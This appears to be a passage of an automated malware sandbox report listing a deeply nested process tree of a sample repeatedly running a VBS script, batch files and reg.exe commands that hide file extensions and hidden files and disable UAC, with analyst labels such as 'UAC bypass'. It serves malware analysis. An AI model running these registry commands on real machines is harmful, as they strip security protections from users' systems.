        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        247⤵
        
        PID:4964
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        244⤵
        
        PID:2300
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        244⤵
        
        PID:1964
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        245⤵
        
        PID:572
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        244⤵
        UAC bypass
        
        PID:3748
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rCgcAwEY.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        244⤵
        
        PID:3196
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        245⤵
        
        PID:1536
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        245⤵
        
        PID:748
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        242⤵
        
        PID:3428
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        242⤵
        
        PID:1208
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        242⤵
        UAC bypass
        
        PID:1080
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DSIkgEcg.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        242⤵
        
        PID:2440
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        243⤵
        
        PID:1584
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        243⤵
        
        PID:4712
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        240⤵
        
        PID:4184
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        241⤵
        
        PID:2756
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        240⤵
        Modifies registry key
        
        PID:4884
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        241⤵
        
        PID:968
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        240⤵
        
        PID:1768
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XmAMkIQY.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        240⤵
        
        PID:1980
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        241⤵
        
        PID:760
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        238⤵
        Modifies visibility of file extensions in Explorer
        
        PID:4564
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        239⤵
        
        PID:3148
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        238⤵
        Modifies registry key
        
        PID:3748
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        238⤵
        UAC bypass
        
        PID:4688
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rgcUoUoQ.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        238⤵
        
        PID:1792
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        239⤵
        
        PID:696
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        236⤵
        Modifies visibility of file extensions in Explorer
        
        PID:4316
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        237⤵
        
        PID:1324
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        236⤵
        Modifies registry key
        
        PID:3752
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        236⤵
        
        PID:2724
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\agQcIcMw.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        236⤵
        
        PID:1872
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        237⤵
        
        PID:360
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        234⤵
        
        PID:1204
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        234⤵
        
        PID:3804
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        234⤵
        
        PID:1552
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EiEMQEYw.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        234⤵
        
        PID:1272
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        235⤵
        
        PID:1728
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        232⤵
        Modifies visibility of file extensions in Explorer
        
        PID:3788
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        232⤵
        
        PID:4200
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        232⤵
        UAC bypass
        
        PID:4128
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\NAooUMUQ.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        232⤵
        
        PID:1964
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        233⤵
        
        PID:2596
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        230⤵
        Modifies visibility of file extensions in Explorer
        
        PID:460
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        231⤵
        
        PID:1672
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        230⤵
        
        PID:4512
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        230⤵
        
        PID:4508
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\LKoIAsoo.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        230⤵
        
        PID:2064
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        231⤵
        
        PID:4336
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        231⤵
        
        PID:1124
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        228⤵
        
        PID:3940
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        228⤵
        
        PID:4408
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        228⤵
        
        PID:1128
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WgsoIAsI.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        228⤵
        
        PID:968
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        229⤵
        
        PID:1556
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        229⤵
        
        PID:3152
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        226⤵
        
        PID:2752
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        226⤵
        
        PID:4200
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        226⤵
        UAC bypass
        
        PID:3164
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AoAAIkcQ.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        226⤵
        
        PID:684
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        227⤵
        
        PID:1324
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        224⤵
        Modifies visibility of file extensions in Explorer
        
        PID:4520
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        224⤵
        
        PID:1436
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        224⤵
        
        PID:4508
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wOYQEAUo.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        224⤵
        
        PID:1844
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        225⤵
        
        PID:2392
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        222⤵
        
        PID:3840
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        222⤵
        
        PID:1552
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        223⤵
        
        PID:2856
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        222⤵
        
        PID:3188
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mEokAEYU.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        222⤵
        
        PID:1672
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        223⤵
        
        PID:2700
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        220⤵
        
        PID:1188
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        220⤵
        
        PID:1392
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        220⤵
        UAC bypass
        
        PID:4416
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VGEMgQwc.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        220⤵
        
        PID:4796
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        221⤵
        
        PID:3584
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        218⤵
        
        PID:3036
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        218⤵
        
        PID:2300
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        219⤵
        
        PID:2228
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        218⤵
        
        PID:804
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\fIgwcoQE.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        218⤵
        
        PID:3792
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        219⤵
        
        PID:5068
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        216⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:4840
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        216⤵
        
        PID:3464
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        216⤵
        
        PID:3804
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vaQAEoAo.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        216⤵
        
        PID:3276
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        217⤵
        
        PID:1276
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        214⤵
        
        PID:3788
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        214⤵
        
        PID:1452
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        215⤵
        
        PID:4692
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        214⤵
        UAC bypass
        Modifies registry key
        
        PID:1648
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YoAMYcAQ.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        214⤵
        
        PID:1640
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        215⤵
        
        PID:4976
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        212⤵
        
        PID:2796
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        213⤵
        
        PID:3944
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        212⤵
        
        PID:3980
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        212⤵
        UAC bypass
        
        PID:3436
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wIgIMQYA.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        212⤵
        
        PID:4796
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        213⤵
        
        PID:4728
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        213⤵
        
        PID:2756
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        210⤵
        Modifies visibility of file extensions in Explorer
        
        PID:3556
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        210⤵
        
        PID:4520
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        210⤵
        UAC bypass
        
        PID:3032
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AUUYsosg.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        210⤵
        
        PID:2460
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        211⤵
        
        PID:2228
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        208⤵
        Modifies visibility of file extensions in Explorer
        
        PID:3796
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        208⤵
        
        PID:2888
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        208⤵
        UAC bypass
        
        PID:1320
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KosMgAIE.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        208⤵
        
        PID:3620
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        209⤵
        
        PID:4848
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        206⤵
        Modifies registry key
        
        PID:3856
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        206⤵
        
        PID:1040
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        206⤵
        
        PID:4464
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VOUYAskM.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        206⤵
        
        PID:1976
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        207⤵
        
        PID:1080
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        204⤵
        
        PID:3428
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        204⤵
        
        PID:3832
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        204⤵
        UAC bypass
        
        PID:4528
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xEIQEUgQ.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        204⤵
        
        PID:1536
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        205⤵
        
        PID:3112
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        205⤵
        
        PID:2988
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        202⤵
        Modifies visibility of file extensions in Explorer
        
        PID:2856
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        202⤵
        
        PID:3188
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        203⤵
        
        PID:388
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        202⤵
        
        PID:2180
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\jawUEMwQ.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        202⤵
        
        PID:4840
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        203⤵
        
        PID:4816
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        203⤵
        
        PID:3196
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        200⤵
        Modifies visibility of file extensions in Explorer
        
        PID:2392
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        200⤵
        Modifies registry key
        
        PID:1040
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        200⤵
        
        PID:2200
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\JGsEYgcs.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        200⤵
        
        PID:4416
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        201⤵
        
        PID:916
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        198⤵
        Modifies visibility of file extensions in Explorer
        
        PID:460
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        198⤵
        
        PID:2168
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        198⤵
        
        PID:1860
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\QYccQgAM.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        198⤵
        
        PID:3404
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        199⤵
        
        PID:748
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        196⤵
        
        PID:2300
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        197⤵
        
        PID:2180
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        196⤵
        
        PID:2108
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        196⤵
        
        PID:1544
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WwQcoswE.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        196⤵
        
        PID:4692
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        197⤵
        
        PID:4948
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        194⤵
        
        PID:1324
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        194⤵
        
        PID:3524
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        195⤵
        
        PID:468
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        194⤵
        Modifies registry key
        
        PID:3636
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WSMYkYAA.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        194⤵
        
        PID:2508
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        195⤵
        
        PID:572
        
